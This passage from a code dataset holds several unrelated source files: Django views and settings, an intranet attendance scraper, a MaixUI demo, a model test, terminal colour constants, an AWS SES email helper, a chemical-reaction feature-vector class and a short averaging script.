get_object_or_404(Movie, pk=movie_pk)\n review_form = ReviewForm()\n reviews = movie.reviews.all()\n context = {\n 'movie': movie,\n 'review_form': review_form,\n 'reviews': reviews,\n }\n return render(request, 'movies/detail.html', context)\n\n\ndef update(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n if request.method == 'POST':\n movie_form = MovieForm(request.POST, instance=movie)\n if movie_form.is_valid():\n movie_form.save()\n return redirect('movies:detail', movie_pk)\n else:\n movie_form = MovieForm(instance=movie)\n context = {\n 'movie_form': movie_form,\n }\n return render(request, 'movies/update.html', context)\n\n\n@require_POST\ndef delete(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n movie.delete()\n return redirect('movies:index')\n\n\n@require_POST\ndef reviews_create(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n review_form = ReviewForm(request.POST)\n if review_form.is_valid():\n content = review_form.cleaned_data.get('content')\n score = review_form.cleaned_data.get('score')\n review = Review(movie_id=movie, content=content, score=score)\n review.save()\n return redirect('movies:detail', movie_pk)\n context = {'review_form': review_form}\n return render(request, 'movies/detail.html', context)\n\n\n@require_POST\ndef reviews_delete(request, movie_pk, review_pk):\n review = get_object_or_404(Review, pk=review_pk)\n review.delete()\n return redirect('movies:detail', movie_pk)\n","sub_path":"pjt_06/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20711933","text":"#!/usr/bin/env python\n\nimport re\nimport os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom Class import Meetup, Workshop, Hackathon, Talk, StockAll\n\n#lien auto login sans le #!/all de fin\nautologin = \"\" + \"/module/2019/B-INN-000/BDX-0-1/\"\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n\nif __name__ == '__main__':\n allActivity = []\n requete = requests.get(autologin + \"#!/all\", timeout=30)\n page = requete.content\n soup = BeautifulSoup(page, \"html.parser\")\n stock = soup.find(\"ul\", {\"class\": \"past\"})\n tmp = stock.findAll(\"li\", {\"data-nb_group\": \"1\"})\n for activite in tmp:\n tmpActivity = None\n line = activite.find('div').find('h2').find('span').find('a')\n if line.text.find('Talk') != -1 or line.text.find('Google Developer Group') != -1:\n tmpActivity = Talk(autologin, line.text)\n elif line.text.find('Meetup') != -1 or line.text.find('sentation projet Urg') != -1 or line.text.find('Pycon') != -1:\n tmpActivity = Meetup(autologin, line.text)\n elif line.text.find('Workshop') != -1:\n tmpActivity = Workshop(autologin, line.text)\n elif line.text.find('Hackathon') != -1 or line.text.find('Semaine de l\\'innovation') != -1:\n tmpActivity = Hackathon(autologin, line.text)\n if (tmpActivity != None):\n print(line)\n tmpActivity.SetTeacher(activite)\n link = activite.find(\"a\", {\"class\": \"registered\"})\n try:\n tmpActivity.scrapPresence(link['href'])\n allActivity.append(tmpActivity)\n except:\n print(\"error\")\n else:\n print(\"ERROR:\" + line.text)\n TabAllPeople = StockAll(autologin)\n for scraped in allActivity:\n TabAllPeople.AddPeople(scraped.SetScore(), scraped.GetName())\n TabAllPeople.bubletri()\n #TabAllPeople.writexls()\n TabAllPeople.TestWithoutMails()\n #TabAllPeople.SendMails()","sub_path":"urlScanIntra.py","file_name":"urlScanIntra.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"628395378","text":"#!/usr/bin/env python3\n\n# This file is part of MaixUI\n# Copyright (c) sipeed.com 2018, 2021\n#\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/mit-license.php\n#\n\n# adb shell 'mkdir demo'\n# adb push ../demo /demo/\n# adb push ./main.py /demo/ && adb shell 'cd /demo && python ./main.py'\n\nfrom view import vi_ui, ui_home, ai_resnet\nfrom driver import m2dock\n\ndef test_view():\n\n task = [\n ui_home.bind(vi_ui.base),\n ai_resnet.bind(vi_ui.base),\n vi_ui.base\n ]\n\n for t in task:\n with t as task:\n for i in range(100):\n task.event()\n\ntest_view()\n\n# class app_v83x(m2dock.m2dock_key):\n\n# def __init__(self) -> None:\n# m2dock.m2dock_key.__init__(self)\n# # asyncio.ensure_future(self.on_event())\n \n# self.bind_task = ai_resnet.bind(vi_ui.base)\n# self.work_task = self.bind_task\n \n# import _thread\n# _thread.start_new_thread(self.thread_event, ())\n\n# def thread_event(self):\n# import time\n# while True:\n# if self.work_task:\n# with self.work_task as task:\n# while self.bind_task == self.work_task:\n# # time.sleep(0.01)\n# task.event()\n# self.work_task = self.bind_task\n\n# def key_S1_press(self):\n# print('key_S1_press')\n# if 'ai_resnet' not in str(self.bind_task):\n# self.bind_task = ai_resnet.bind(vi_ui.base)\n\n# def key_S2_press(self):\n# print('key_S2_press')\n# if 'ui_home' not in str(self.bind_task):\n# self.bind_task = ui_home.bind(vi_ui.base)\n\n# async def on_event(self):\n# while True:\n# await asyncio.sleep(0.05)\n\n# if __name__ == '__main__':\n\n# # test_view()\n\n# import signal\n# signal.signal(signal.SIGINT, lambda sig, stack_frame: exit(1))\n# signal.signal(signal.SIGQUIT, lambda sig, stack_frame: exit(1))\n\n# import asyncio\n# import uvloop\n\n# uvloop.install()\n\n# app = app_v83x()\n\n# loop = asyncio.get_event_loop()\n# print(loop)\n# loop.run_forever()\n","sub_path":"examples/maix_v831/demo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"577182249","text":"\"\"\"\nDjango settings for LingoDream Project project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\nimport environ\n\nROOT_DIR = environ.Path(__file__) - 3 # (lingodream/config/settings/base.py - 3 = lingodream/)\nAPPS_DIR = ROOT_DIR.path('lingodream')\n\n# Load operating system environment variables and then prepare to use them\nenv = environ.Env()\n\n# .env file, should load only in development environment\nREAD_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)\n\nif READ_DOT_ENV_FILE:\n # Operating System Environment variables have precedence over variables defined in the .env file,\n # that is to say variables from the .env files will only be used if not defined\n # as environment variables.\n env_file = str(ROOT_DIR.path('.env'))\n print('Loading : {}'.format(env_file))\n env.read_env(env_file)\n print('The .env file has been loaded. See base.py for more information')\n\n# APP CONFIGURATION\n# ------------------------------------------------------------------------------\nDJANGO_APPS = [\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n\n # Admin\n 'grappelli', # grappelli third party admin interface\n 'django.contrib.admin',\n]\nTHIRD_PARTY_APPS = [\n 'crispy_forms', # Form layouts\n 'allauth', # registration\n 'allauth.account', # registration\n 'allauth.socialaccount', # registration\n 'django_countries', # CountryField\n 'django_languages', # LanguageField\n 'django_messages', # user-to-user private messaging\n 'pinax.notifications',\n 'condottieri_notification', # show notifications on signing in\n 'django_comments_xtd', # these two must be present at the same time, in this order\n 'django_comments', # these two must be present at the same time, in this order\n 'avatar',\n 'taggit',\n 'taggit_templatetags2',\n]\n\n# Apps specific for this project go here.\nLOCAL_APPS = [\n # custom users app\n 'lingodream.users.apps.UsersConfig',\n # Your stuff: custom apps go here\n 'lingodream.signup',\n 'lingodream.follow',\n 'lingodream.learn',\n 'lingodream.chinese_processing',\n 'lingodream.japanese_processing',\n #'lingodream.korean_processing',\n 'lingodream.flashcards',\n 'lingodream.articles',\n 'lingodream.landing',\n\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# MIDDLEWARE CONFIGURATION\n# ------------------------------------------------------------------------------\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'lingodream.users.middleware.timezone_middleware.TimezoneMiddleware', # custom TimezoneMiddleware\n]\n\n# MIGRATIONS CONFIGURATION\n# ------------------------------------------------------------------------------\nMIGRATION_MODULES = {\n 'sites': 'lingodream.contrib.sites.migrations'\n}\n\n# DEBUG\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = env.bool('DJANGO_DEBUG', False)\n\n# FIXTURE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n str(APPS_DIR.path('fixtures')),\n)\n\n# EMAIL CONFIGURATION\n# ------------------------------------------------------------------------------\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')\n\n# MANAGER CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = [\n (\"\"\"Zilong Li\"\"\", 'zilongli@protonmail.com'),\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n\n# DATABASE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': env.db('DATABASE_URL', default='postgres:///lingodream'),\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n\n\n# GENERAL CONFIGURATION\n# ------------------------------------------------------------------------------\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'UTC'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n\n# TEMPLATE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES = [\n {\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'OPTIONS': {\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n 'debug': DEBUG,\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\n # https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n # Your stuff: custom template context processors go here\n 'django_messages.context_processors.inbox', # {{ messages_inbox_count }}\n 'condottieri_notification.context_processors.notification',\n ],\n },\n },\n]\n\n# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\n# STATIC FILE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\nSTATIC_ROOT = str(ROOT_DIR('staticfiles'))\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = [\n str(APPS_DIR.path('static')),\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n]\n\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = str(APPS_DIR('media'))\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\nMEDIA_URL = '/media/'\n\n# URL Configuration\n# ------------------------------------------------------------------------------\nROOT_URLCONF = 'config.urls'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'config.wsgi.application'\n\n# PASSWORD STORAGE SETTINGS\n# ------------------------------------------------------------------------------\n# See https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django\nPASSWORD_HASHERS = [\n 'django.contrib.auth.hashers.Argon2PasswordHasher',\n 'django.contrib.auth.hashers.PBKDF2PasswordHasher',\n 'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',\n 'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',\n 'django.contrib.auth.hashers.BCryptPasswordHasher',\n]\n\n# PASSWORD VALIDATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators\n# ------------------------------------------------------------------------------\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# AUTHENTICATION CONFIGURATION\n# ------------------------------------------------------------------------------\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n #'guardian.backends.ObjectPermissionBackend', userena's dependency for privacy management\n]\n\n# Allauth authentication scheme\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 3\nACCOUNT_EMAIL_CONFIRMATION_COOLDOWN = 180\nACCOUNT_LOGIN_ATTEMPTS_LIMIT = 5\nACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 600\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = False\n# ACCOUNT_USERNAME_MIN_LENGTH = 5\nACCOUNT_SIGNUP_FORM_CLASS = 'lingodream.signup.forms.SignupForm'\n\n\nACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)\nACCOUNT_ADAPTER = 'lingodream.users.adapters.AccountAdapter'\nSOCIALACCOUNT_ADAPTER = 'lingodream.users.adapters.SocialAccountAdapter'\n\n# django_messages\nDJANGO_MESSAGES_NOTIFY = True\n# pinax_notifications\n# https://pinax-notifications.readthedocs.io/en/latest/settings/\n# DEFAULT_FROM_EMAIL = 'webmaster@localhost'\nPINAX_USE_SSL = False\n# PINAX_NOTIFICATIONS_QUEUE_ALL = False\n# PINAX_NOTIFICATIONS_LOCK_WAIT_TIMEOUT = -1\n# PINAX_NOTIFICATIONS_LANGUAGE_MODEL =\n\nPINAX_NOTIFICATIONS_BACKENDS = [\n (\"email\", \"pinax.notifications.backends.email.EmailBackend\"),\n ('on site', 'condottieri_notification.backends.SiteBackend'),\n]\n\n\n# django-comments-xtd\nCOMMENTS_APP = 'django_comments_xtd'\nCOMMENTS_XTD_MAX_THREAD_LEVEL = 4\nCOMMENTS_XTD_CONFIRM_EMAIL = True\n# Source mail address used for notifications.\nCOMMENTS_XTD_FROM_EMAIL = \"noreply@lingodream.com\"\n# Contact mail address to show in messages.\nCOMMENTS_XTD_CONTACT_EMAIL = \"help@lingodream.com\"\n\nCOMMENTS_XTD_APP_MODEL_OPTIONS = {\n 'default': {\n 'allow_flagging': True,\n 'allow_feedback': True,\n 'show_feedback': False,\n },\n}\n\n\n# Display formats\nDATE_FORMAT = 'j N Y'\nDATETIME_FORMAT = 'j N Y, H:i'\nSHORT_DATETIME_FORMAT = 'd/m/Y P'\nFORMAT_MODULE_PATH = [\n 'lingodream.formats',\n]\n\n# Custom settings variables\nCV_USE_HTTPS = False\nPACKAGE_DATA_DIR = str(APPS_DIR('package_data'))\nJIEBA_DICT_PATH = str(APPS_DIR('package_data/jieba_dict.txt.big'))\n\n\n# Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = 'users.User'\nLOGIN_REDIRECT_URL = 'users:redirect'\nLOGIN_URL = 'account_login'\n\n# SLUGLIFIER\nAUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'\n\n########## CELERY\nINSTALLED_APPS += ['lingodream.taskapp.celery.CeleryConfig']\nCELERY_BROKER_URL = env('CELERY_BROKER_URL', default='django://')\nif CELERY_BROKER_URL == 'django://':\n CELERY_RESULT_BACKEND = 'redis://'\nelse:\n CELERY_RESULT_BACKEND = CELERY_BROKER_URL\n########## END CELERY\n# django-compressor\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ['compressor']\nSTATICFILES_FINDERS += ['compressor.finders.CompressorFinder']\n\n# Location of root django.contrib.admin URL, use {% url 'admin:index' %}\nADMIN_URL = r'^admin/'\n\n# Your common stuff: Below this line define 3rd party library settings\n# ------------------------------------------------------------------------------\n\n# Localisation config\nLOCALE_PATHS = (\n str(APPS_DIR.path('locale')),\n)\n\n# Site languages\n\nLANGUAGES = (\n (\"en\", \"English\"),\n (\"zh-hans\", \"Simplified Chinese\"),\n (\"zh-hant\", \"Traditional Chinese\"),\n (\"es\", \"Spanish\"),\n (\"fr\", \"French\"),\n (\"pt\", \"Portuguese\"),\n (\"de\", \"German\"),\n (\"ja\", \"Japanese\"),\n (\"ko\", \"Chinese\"),\n (\"it\", \"Italian\"),\n (\"ru\", \"Russian\"),\n (\"ar\", \"Arabic\"),\n (\"sv\", \"Swedish\"),\n (\"hi\", \"Hindi\"),\n (\"tr\", \"Turkish\"),\n (\"pl\", \"Polish\"),\n (\"nl\", \"Dutch\"),\n (\"bn\", \"Bengali\"),\n (\"cs\", \"Czech\"),\n (\"vi\", \"Vietnamese\"),\n (\"th\", \"Thai\"),\n (\"eo\", \"Esperanto\"),\n (\"jbo\", \"Lojban\"),\n)\n\n# add Lojban\nimport django.conf.locale\n\nEXTRA_LANG_INFO = {\n 'jbo': {\n 'bidi': False, # right-to-left\n 'code': 'jbo',\n 'name': 'Lojban',\n 'name_local': 'lojban',\n },\n}\n\nLANG_INFO = django.conf.locale.LANG_INFO.copy()\nLANG_INFO.update(EXTRA_LANG_INFO)\n\ndjango.conf.locale.LANG_INFO = LANG_INFO\n","sub_path":"config/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"69234530","text":"# -*- coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom shop.models.defaults.address import ShippingAddress\nfrom shop.models.defaults.customer import Customer\n\n\nclass AddressTest(TestCase):\n def setUp(self):\n super(AddressTest, self).setUp()\n User = get_user_model()\n user = {\n 'username': 'john',\n 'first_name': 'John',\n 'last_name': 'Doe',\n 'email': 'john@example.com',\n 'password': 'secret',\n }\n user = User.objects.create(**user)\n self.customer = Customer.objects.create(user=user)\n self.assertGreaterEqual(self.customer.pk, 1)\n\n def test_shipping_address(self):\n address = {'name': \"John Doe\", 'address1': \"31, Orwell Rd\", 'zip_code': \"L41RG\",\n 'city': \"Liverpool\", 'country': 'UK'}\n shipping_addr = ShippingAddress.objects.create(priority=1, customer=self.customer, **address)\n self.assertGreaterEqual(shipping_addr.id, 1)\n addr_block = \"John Doe\\n31, Orwell Rd\\nL41RG Liverpool\\nUK\\n\"\n self.assertMultiLineEqual(shipping_addr.as_text(), addr_block)\n self.assertEqual(ShippingAddress.objects.get_max_priority(self.customer), 1)\n self.assertEqual(ShippingAddress.objects.get_fallback(self.customer), shipping_addr)\n","sub_path":"example/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"210799061","text":"\"\"\"Constants for terminal formatting\"\"\"\n\ncolors = 'dark', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'gray'\nFG_COLORS = dict(zip(colors, range(30, 38)))\nBG_COLORS = dict(zip(colors, range(40, 48)))\nSTYLES = dict(zip(('bold', 'dark', 'underline', 'blink', 'invert'), [1,2,4,5,7]))\nFG_NUMBER_TO_COLOR = {v:k for k, v in FG_COLORS.items()}\nBG_NUMBER_TO_COLOR = {v:k for k, v in BG_COLORS.items()}\nNUMBER_TO_STYLE = {v:k for k, v in STYLES.items()}\nRESET_ALL = 0\nRESET_FG = 39\nRESET_BG = 49\n\ndef seq(num):\n return '\u001B[%sm' % num\n\n","sub_path":"fmtstr/termformatconstants.py","file_name":"termformatconstants.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"177316348","text":"from threading import Thread\nfrom flask import current_app, render_template\nfrom flask_mail import Message\nfrom .factory import mail\nimport boto3\n\n\ndef send_async_email(app, ses, sender, recipients, subject, text, html):\n with app.app_context():\n current_app.logger.info(\"In Sending Thread\")\n ses.send_email(\n Source=sender,\n Destination={'ToAddresses': recipients},\n Message={\n 'Subject': {'Data': subject},\n 'Body': {\n 'Text': {'Data': text},\n 'Html': {'Data': html}\n }\n }\n )\n\n\ndef send_email(recipients, sender=None, subject='', template='', **kwargs):\n ses = boto3.client(\n 'ses',\n region_name=current_app.config['SES_REGION_NAME'],\n aws_access_key_id=current_app.config['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=current_app.config['AWS_SECRET_ACCESS_KEY']\n )\n if not sender:\n sender = current_app.config['SES_EMAIL_SOURCE']\n\n html = render_template(template + '.html', **kwargs)\n text = render_template(template + '.txt', **kwargs)\n\n app = current_app._get_current_object()\n thr = Thread(target=send_async_email, args=[app, ses, sender, [recipients], subject,\n text, html])\n thr.start()\n return thr\n\n","sub_path":"web_participant/flask_app/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"285623160","text":"import numpy as np\nfrom itertools import combinations_with_replacement\nfrom DrivingCoordinate import DriveCoordType, DrivingCoordinate\n\nclass Reaction():\n '''\n A class representing a chemical reaction\n '''\n\n def __init__(self, id=None, activationEnergy=None, heatOfRxn=None, reactants=None):\n '''\n Constructor\n '''\n self._possibleAtoms = 'BCHNO'\n self._id = id\n self._activationEnergy = activationEnergy\n self._heatOfRxn = heatOfRxn\n self._drivingCoordinates = []\n self._reactants = reactants # currently only expecting a single pybel molecule\n # TODO: add miscellaneous values (the ones in the dataset not associated with an\n # add or break move)\n\n def addDrivingCoordinate(self, drivingCoordinate):\n self._drivingCoordinates.append(drivingCoordinate)\n\n def sortDrivingCoordinates(self):\n '''\n Sort the atoms within each driving coordinate and then sort the driving coordinates\n by the lower of the 2 charges associated with each\n '''\n addMoves = self.movesOfType(DriveCoordType.ADD)\n breakMoves = self.movesOfType(DriveCoordType.BREAK)\n for addMove in addMoves:\n addMove.sortByCharge()\n for breakMove in breakMoves:\n breakMove.sortByCharge()\n addMoves = sorted(addMoves, key=lambda x : x._NBO[0])\n breakMoves = sorted(breakMoves, key=lambda x : x._NBO[0])\n \n return addMoves, breakMoves\n\n def movesOfType(self, type):\n '''\n return all driving coordinates of argument type\n '''\n return list(filter(lambda x : x._Type == type,self._drivingCoordinates))\n \n def buildFeatureVector(self,includeChargeMult=False,includeAddBreak=False,isSorted=True):\n '''\n Builds a feature vector containing data associated with this Reaction\n includeChargeMult: whether to include the product of the 2 charges in each driving\n coordinate as features (5 add + 5 break driving coordinates = 10 features)\n inculdeAddBreak: whether to include the existance of each possible pair of elements\n as a one-hot (binary) feature (num elements choose 2 features). If the pair of\n elements appears in an add or break move, the feature value is 1 (otherwise 0)\n isSorted: whether to sort the driving coordinates before constructing the feature vector\n '''\n # up to 40+10=50 features because of hard limit on add and break moves of 5 and 4 features per move\n if isSorted:\n addMoves, breakMoves = self.sortDrivingCoordinates()\n else:\n addMoves = self.movesOfType(DriveCoordType.ADD)\n breakMoves = self.movesOfType(DriveCoordType.BREAK)\n \n featureVector = np.zeros((40))\n featureVecChargeMult = np.zeros((10))\n for i, addMove in enumerate(addMoves):\n featureVector[2*i:2*(i+1)] = addMove._NBO\n featureVector[10+2*i:10+2*(i+1)] = addMove._Hybrid\n featureVecChargeMult[i] = addMove._NBO[0] * addMove._NBO[1]\n \n for i, breakMove in enumerate(breakMoves):\n #print(breakMove._NBO)\n featureVector[20+2*i:20+2*(i+1)] = breakMove._NBO\n featureVector[30+2*i:30+2*(i+1)] = breakMove._Hybrid\n featureVecChargeMult[5+i] = breakMove._NBO[0] * breakMove._NBO[1]\n #print (\"feature vector\", featureVector)\n #print (\"charge\", featureVecChargeMult)\n if includeChargeMult:\n featureVector = np.concatenate((featureVector, featureVecChargeMult))\n if includeAddBreak:\n featureVector = np.concatenate((featureVector, self.buildAddBrkFeatureVector()))\n return featureVector\n\n def buildAddBrkFeatureVector(self):\n possibleBonds = list(combinations_with_replacement(self._possibleAtoms, 2))\n featureVector = np.zeros((len(possibleBonds)))\n for i, bond in enumerate(possibleBonds):\n for coordinate in self._drivingCoordinates:\n if (coordinate._Atoms[0] == bond[0] and coordinate._Atoms[1] == bond[1]) or\\\n (coordinate._Atoms[0] == bond[1] and coordinate._Atoms[1] == bond[0]):\n featureVector[i] = 1\n return featureVector\n\n def buildOrderedFeatureVector(self):\n '''\n Builds an alterantive feature vector to buildFeatureVector. An ordering of possible\n pairs of elements is chosen and two binary features (one for add and one for break) are\n created for each pair of elements corresponding to whether the reaction contains a move\n of the given type between the pair of elements. For each of these features a corresponding\n feature is created to contain the charge product of the elements in the add or break move.\n \n Example: if the 5th feature corresponds to whether there is an add move between carbon\n and hydrogen and there are 15 of this type of feature, the 20th feature correpsonds to the\n charge product of the carbon and hydrogen involved in the add move\n '''\n possibleBonds = list(combinations_with_replacement(sorted(self._possibleAtoms), 2))\n existenceFeatures = np.zeros((len(possibleBonds)*2))\n chargeMultFeatures = np.zeros((len(possibleBonds)*2))\n for coordinate in self._drivingCoordinates:\n index = possibleBonds.index(tuple(sorted(coordinate._Atoms)))\n if coordinate._Type == DriveCoordType.ADD:\n if existenceFeatures[index] == 1:\n chargeMultFeatures[index] = max(chargeMultFeatures[index], coordinate.chargeProduct())\n else:\n chargeMultFeatures[index] = coordinate.chargeProduct()\n existenceFeatures[index] = 1\n elif coordinate._Type == DriveCoordType.BREAK:\n index += len(possibleBonds) # break move indices start where add move indices end\n if existenceFeatures[index] == 1:\n chargeMultFeatures[index] = min(chargeMultFeatures[index], coordinate.chargeProduct())\n else:\n chargeMultFeatures[index] = coordinate.chargeProduct()\n existenceFeatures[index] = 1\n else: raise Exception('Invalid coordinate type!')\n return np.concatenate((existenceFeatures, chargeMultFeatures))\n\n def build_atom_rep_feature_vec(self):\n '''\n Builds feature vector representing this reaction using representations of the atoms\n involved in the GSM driving coordinates\n '''\n featureVec = []\n for type in DriveCoordType:\n coordReps = np.array([coord.build_atom_rep_feature_vec() for coord in self.movesOfType(type)])\n if coordReps.size:\n featureVec += list(np.max(coordReps, axis=0))\n featureVec += list(np.min(coordReps, axis=0))\n featureVec += list(np.mean(coordReps, axis=0))\n featureVec.append(coordReps.shape[0])\n else:\n featureVec += [0] * (DrivingCoordinate.atom_rep_feature_vec_size() * 3 + 1) \n return np.array(featureVec)\n ","sub_path":"Python/Reaction.py","file_name":"Reaction.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535642081","text":"total = 0\nx = 0\nwhile True:\n Num = input('Enter a number: ')\n # if done is enter, end the loop and complete the calcs\n if Num == 'done':\n break\n else:\n try:\n total += float(Num)\n except:\n print('bad input')\n continue\n # count up the nbr of entries\n x += 1\n# print out the sum, count, and avg\nprint(total, x, float(total) / x)\n","sub_path":"Ex5_10_1.py","file_name":"Ex5_10_1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"58148227","text":"from flask import Flask, request, jsonify, json\nfrom flask_restful import Api, Resource\nfrom datetime import datetime \nfrom flask_cors import CORS\nfrom flask_pymongo import PyMongo\nfrom marshmallow import Schema, fields, ValidationError\nfrom 